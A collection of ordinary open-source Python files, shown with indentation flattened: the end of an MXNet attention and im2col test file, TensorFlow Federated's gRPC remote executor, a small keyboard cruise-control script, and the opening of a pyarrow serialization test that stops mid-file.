output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@with_seed()
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
if __name__ == '__main__':
import nose
nose.runmodule()
|
remote_executor.py
|
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A local proxy for a remote executor service hosted on a separate machine."""
import asyncio
import itertools
import queue
import threading
import weakref
import absl.logging as logging
import grpc
from tensorflow_federated.proto.v0 import executor_pb2
from tensorflow_federated.proto.v0 import executor_pb2_grpc
from tensorflow_federated.python.common_libs import anonymous_tuple
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.common_libs import tracing
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.impl import executor_service_utils
from tensorflow_federated.python.core.impl.executors import execution_context
from tensorflow_federated.python.core.impl.executors import executor_base
from tensorflow_federated.python.core.impl.executors import executor_value_base
_STREAM_CLOSE_WAIT_SECONDS = 10
class RemoteValue(executor_value_base.ExecutorValue):
"""A reference to a value embedded in a remotely deployed executor service."""
def __init__(self, value_ref: executor_pb2.ValueRef, type_spec, executor):
"""Creates the value.
Args:
value_ref: An instance of `executor_pb2.ValueRef` returned by the remote
executor service.
type_spec: An instance of `computation_types.Type`.
executor: The executor that created this value.
"""
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
py_typecheck.check_type(type_spec, computation_types.Type)
py_typecheck.check_type(executor, RemoteExecutor)
self._value_ref = value_ref
self._type_signature = type_spec
self._executor = executor
# Clean up the value and the memory associated with it on the remote
# worker when no references to it remain.
def finalizer(value_ref, executor):
executor._dispose(value_ref) # pylint: disable=protected-access
weakref.finalize(self, finalizer, value_ref, executor)
@property
def type_signature(self):
return self._type_signature
@tracing.trace(span=True)
async def compute(self):
return await self._executor._compute(self._value_ref) # pylint: disable=protected-access
@property
def value_ref(self):
return self._value_ref
class _BidiStream:
"""A bidi stream connection to the Executor service's Execute method."""
def __init__(self, stub, thread_pool_executor):
self._stub = stub
self._thread_pool_executor = thread_pool_executor
self._is_initialized = False
def _lazy_init(self):
"""Lazily initialize the underlying gRPC stream."""
if self._is_initialized:
return
logging.debug('Initializing bidi stream')
self._request_queue = queue.Queue()
self._response_event_dict = {}
self._stream_closed_event = threading.Event()
def request_iter():
"""Iterator that blocks on the request Queue."""
for seq in itertools.count():
logging.debug('Request thread: blocking for next request')
val = self._request_queue.get()
if val:
py_typecheck.check_type(val[0], executor_pb2.ExecuteRequest)
py_typecheck.check_type(val[1], threading.Event)
req = val[0]
req.sequence_number = seq
logging.debug(
'Request thread: processing request of type %s, seq_no %s',
val[0].WhichOneof('request'), seq)
self._response_event_dict[seq] = val[1]
yield val[0]
else:
logging.debug(
'Request thread: Final request received. Stream will close.')
# None means we are done processing
return
response_iter = self._stub.Execute(request_iter())
def response_thread_fn():
"""Consumes response iter and exposes the value on corresponding Event."""
try:
logging.debug('Response thread: blocking for next response')
for response in response_iter:
logging.debug(
'Response thread: processing response of type %s, seq_no %s',
response.WhichOneof('response'), response.sequence_number)
# Get the corresponding response Event
response_event = self._response_event_dict[response.sequence_number]
# Attach the response as an attribute on the Event
response_event.response = response
response_event.set()
# Set the event indicating the stream has been closed
self._stream_closed_event.set()
except grpc.RpcError as error:
logging.exception('Error calling remote executor: %s', error)
response_thread = threading.Thread(target=response_thread_fn)
response_thread.daemon = True
response_thread.start()
self._is_initialized = True
@tracing.trace(span=True)
async def send_request(self, request):
"""Send a request on the bidi stream."""
self._lazy_init()
py_typecheck.check_type(request, executor_pb2.ExecuteRequest)
request_type = request.WhichOneof('request')
response_event = threading.Event()
# Enqueue a tuple of request and an Event used to return the response
self._request_queue.put((request, response_event))
await asyncio.get_event_loop().run_in_executor(self._thread_pool_executor,
response_event.wait)
response = response_event.response # pytype: disable=attribute-error
if isinstance(response, Exception):
raise response
py_typecheck.check_type(response, executor_pb2.ExecuteResponse)
response_type = response.WhichOneof('response')
if response_type != request_type:
raise ValueError('Request had type: {} but response had type: {}'.format(
request_type, response_type))
return response
def close(self):
if self._is_initialized:
logging.debug('Closing bidi stream')
self._request_queue.put(None)
# Wait for the stream to be closed
self._stream_closed_event.wait(_STREAM_CLOSE_WAIT_SECONDS)
else:
logging.debug('Closing unused bidi stream')
self._is_initialized = False
def _request(rpc_func, request):
with tracing.wrap_rpc_in_trace_context():
try:
return rpc_func(request)
except grpc.RpcError as e:
if _is_retryable_grpc_error(e):
logging.info('Received retryable gRPC error: %s', e)
raise execution_context.RetryableError(e)
else:
raise
def _is_retryable_grpc_error(error):
"""Predicate defining what is a retryable gRPC error."""
non_retryable_errors = {
grpc.StatusCode.INVALID_ARGUMENT,
grpc.StatusCode.NOT_FOUND,
grpc.StatusCode.ALREADY_EXISTS,
grpc.StatusCode.PERMISSION_DENIED,
grpc.StatusCode.FAILED_PRECONDITION,
grpc.StatusCode.ABORTED,
grpc.StatusCode.OUT_OF_RANGE,
grpc.StatusCode.UNIMPLEMENTED,
grpc.StatusCode.DATA_LOSS,
grpc.StatusCode.UNAUTHENTICATED,
}
return (isinstance(error, grpc.RpcError) and
error.code() not in non_retryable_errors)
class RemoteExecutor(executor_base.Executor):
"""The remote executor is a local proxy for a remote executor instance."""
# TODO(b/134543154): Switch to using an asynchronous gRPC client so we don't
# have to block on all those calls.
def __init__(self,
channel,
rpc_mode='REQUEST_REPLY',
thread_pool_executor=None,
dispose_batch_size=20):
"""Creates a remote executor.
Args:
channel: An instance of `grpc.Channel` to use for communication with the
remote executor service.
rpc_mode: Optional mode of calling the remote executor. Must be either
'REQUEST_REPLY' or 'STREAMING' (defaults to 'REQUEST_REPLY'). This
option will be removed after the request-reply interface is deprecated.
thread_pool_executor: Optional concurrent.futures.Executor used to wait
for the reply to a streaming RPC message. Uses the default Executor if
not specified.
dispose_batch_size: The batch size for requests to dispose of remote
worker values. Lower values will result in more requests to the remote
worker, but will result in values being cleaned up sooner and therefore
may result in lower memory usage on the remote worker.
"""
py_typecheck.check_type(channel, grpc.Channel)
py_typecheck.check_type(rpc_mode, str)
py_typecheck.check_type(dispose_batch_size, int)
if rpc_mode not in ['REQUEST_REPLY', 'STREAMING']:
raise ValueError('Invalid rpc_mode: {}'.format(rpc_mode))
logging.debug('Creating new ExecutorStub with RPC_MODE=%s', rpc_mode)
self._stub = executor_pb2_grpc.ExecutorStub(channel)
self._bidi_stream = None
self._dispose_batch_size = dispose_batch_size
self._dispose_request = executor_pb2.DisposeRequest()
if rpc_mode == 'STREAMING':
logging.debug('Creating Bidi stream')
self._bidi_stream = _BidiStream(self._stub, thread_pool_executor)
def close(self):
if self._bidi_stream is not None:
logging.debug('Closing bidi stream')
self._bidi_stream.close()
def _dispose(self, value_ref: executor_pb2.ValueRef):
"""Disposes of the remote value stored on the worker service."""
self._dispose_request.value_ref.append(value_ref)
if len(self._dispose_request.value_ref) < self._dispose_batch_size:
return
dispose_request = self._dispose_request
self._dispose_request = executor_pb2.DisposeRequest()
if self._bidi_stream is None:
_request(self._stub.Dispose, dispose_request)
else:
send_request_fut = self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(dispose=dispose_request))
# We don't care about the response, and so don't bother to await it.
# Just start it as a task so that it runs at some point.
asyncio.get_event_loop().create_task(send_request_fut)
@tracing.trace(span=True)
async def create_value(self, value, type_spec=None):
@tracing.trace
def serialize_value():
return executor_service_utils.serialize_value(value, type_spec)
value_proto, type_spec = serialize_value()
create_value_request = executor_pb2.CreateValueRequest(value=value_proto)
if self._bidi_stream is None:
response = _request(self._stub.CreateValue, create_value_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_value=create_value_request)
)).create_value
py_typecheck.check_type(response, executor_pb2.CreateValueResponse)
return RemoteValue(response.value_ref, type_spec, self)
@tracing.trace(span=True)
async def create_call(self, comp, arg=None):
py_typecheck.check_type(comp, RemoteValue)
py_typecheck.check_type(comp.type_signature, computation_types.FunctionType)
if arg is not None:
py_typecheck.check_type(arg, RemoteValue)
create_call_request = executor_pb2.CreateCallRequest(
function_ref=comp.value_ref,
argument_ref=(arg.value_ref if arg is not None else None))
if self._bidi_stream is None:
response = _request(self._stub.CreateCall, create_call_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_call=create_call_request)
)).create_call
py_typecheck.check_type(response, executor_pb2.CreateCallResponse)
return RemoteValue(response.value_ref, comp.type_signature.result, self)
@tracing.trace(span=True)
async def create_struct(self, elements):
constructed_anon_tuple = anonymous_tuple.from_container(elements)
proto_elem = []
type_elem = []
for k, v in anonymous_tuple.iter_elements(constructed_anon_tuple):
py_typecheck.check_type(v, RemoteValue)
proto_elem.append(
executor_pb2.CreateStructRequest.Element(
name=(k if k else None), value_ref=v.value_ref))
type_elem.append((k, v.type_signature) if k else v.type_signature)
result_type = computation_types.StructType(type_elem)
request = executor_pb2.CreateStructRequest(element=proto_elem)
if self._bidi_stream is None:
response = _request(self._stub.CreateStruct, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_struct=request))).create_struct
py_typecheck.check_type(response, executor_pb2.CreateStructResponse)
return RemoteValue(response.value_ref, result_type, self)
@tracing.trace(span=True)
async def create_selection(self, source, index=None, name=None):
py_typecheck.check_type(source, RemoteValue)
py_typecheck.check_type(source.type_signature, computation_types.StructType)
if index is not None:
py_typecheck.check_type(index, int)
py_typecheck.check_none(name)
result_type = source.type_signature[index]
else:
py_typecheck.check_type(name, str)
result_type = getattr(source.type_signature, name)
request = executor_pb2.CreateSelectionRequest(
source_ref=source.value_ref, name=name, index=index)
if self._bidi_stream is None:
response = _request(self._stub.CreateSelection, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_selection=request)
)).create_selection
py_typecheck.check_type(response, executor_pb2.CreateSelectionResponse)
return RemoteValue(response.value_ref, result_type, self)
@tracing.trace(span=True)
async def _compute(self, value_ref):
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
request = executor_pb2.ComputeRequest(value_ref=value_ref)
if self._bidi_stream is None:
response = _request(self._stub.Compute, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(compute=request))).compute
py_typecheck.check_type(response, executor_pb2.ComputeResponse)
value, _ = executor_service_utils.deserialize_value(response.value)
return value
|
keyboard_ctrl.py
|
import sys
import termios
import time
from termios import (BRKINT, CS8, CSIZE, ECHO, ICANON, ICRNL, IEXTEN, INPCK,
ISIG, ISTRIP, IXON, PARENB, VMIN, VTIME)
from typing import Any
import cereal.messaging as messaging
# Indexes for termios list.
IFLAG = 0
OFLAG = 1
CFLAG = 2
LFLAG = 3
ISPEED = 4
OSPEED = 5
CC = 6
def getch():
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
# set
mode = termios.tcgetattr(fd)
mode[IFLAG] = mode[IFLAG] & ~(BRKINT | ICRNL | INPCK | ISTRIP | IXON)
#mode[OFLAG] = mode[OFLAG] & ~(OPOST)
mode[CFLAG] = mode[CFLAG] & ~(CSIZE | PARENB)
mode[CFLAG] = mode[CFLAG] | CS8
mode[LFLAG] = mode[LFLAG] & ~(ECHO | ICANON | IEXTEN | ISIG)
mode[CC][VMIN] = 1
mode[CC][VTIME] = 0
termios.tcsetattr(fd, termios.TCSAFLUSH, mode)
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def keyboard_poll_thread(q):
while True:
c = getch()
print("got %s" % c)
if c == '1':
q.put(str("cruise_up"))
if c == '2':
q.put(str("cruise_down"))
if c == '3':
q.put(str("cruise_cancel"))
if c == 'q':
exit(0)
def test(q):
while 1:
print("hello")
time.sleep(1.0)
if __name__ == '__main__':
from multiprocessing import Process, Queue
q : Any = Queue()
p = Process(target=test, args=(q,))
p.daemon = True
p.start()
keyboard_poll_thread(q)
|
test_serialization.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import division
import pytest
import collections
import datetime
import os
import pickle
import subprocess
import string
import sys
import pyarrow as pa
import numpy as np
import pyarrow.tests.util as test_util
try:
import torch
except ImportError:
torch = None
# Blacklist the module in case `import torch` is costly before
# failing (ARROW-2071)
sys.modules['torch'] = None
def assert_equal(obj1, obj2):
if torch is not None and torch.is_tensor(obj1) and torch.is_tensor(obj2):
assert torch.equal(obj1, obj2)
return
module_numpy = (type(obj1).__module__ == np.__name__ or
type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ()) or
(hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently np.testing.assert_equal
# fails because we do not properly handle different numerical
# types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) ==
set(list(obj2.__dict__.keys()) + special_keys)), ("Objects {} "
"and {} are "
"different."
.format(
obj1,
obj2))
try:
# Workaround to make comparison of OrderedDicts work on Python 2.7
if obj1 == obj2:
return
except Exception:
pass
if obj1.__dict__ == {}:
print("WARNING: Empty dict in ", obj1)
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
